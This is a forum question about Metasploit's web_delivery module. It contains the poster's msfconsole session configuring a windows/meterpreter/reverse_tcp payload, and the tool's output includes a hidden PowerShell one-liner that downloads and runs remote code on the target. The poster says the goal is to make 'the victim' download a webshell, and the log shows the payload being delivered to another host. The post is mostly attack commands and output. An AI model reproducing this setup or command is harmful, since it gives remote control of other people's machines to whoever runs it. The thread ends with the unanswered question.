Jump to content

Where does metasploit create webshell ?!


pierre
 Share

Recommended Posts

Hello, I want the victim to download a webshell by connecting on my apache webserver. Everythings seems well but when I create the webshell, I don't know where it is ..... Look :

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: , , seh, thread, process, none)
LHOST 192.168.0.1 yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
2 PSH

msf exploit(web_delivery) > exploit [*] Exploit running as background job.
[*] Started reverse handler on 192.168.0.1:4444 [*] Using URL: http://0.0.0.0:8080/6PXdn4l [*] Local IP: http://127.0.0.1:8080/6PXdn4l [*] Server started. [*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.0.1:8080/6PXdn4l'))
msf exploit(web_delivery) > [*] 192.168.0.2 web_delivery - Delivering Payload

After I have to put the webshell at /var/www/html on my attack computer but I can't find it.....

root@osboxes:/# locate powershell.exe
root@osboxes:/#

Nothing return....

Have you got solutions ??

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...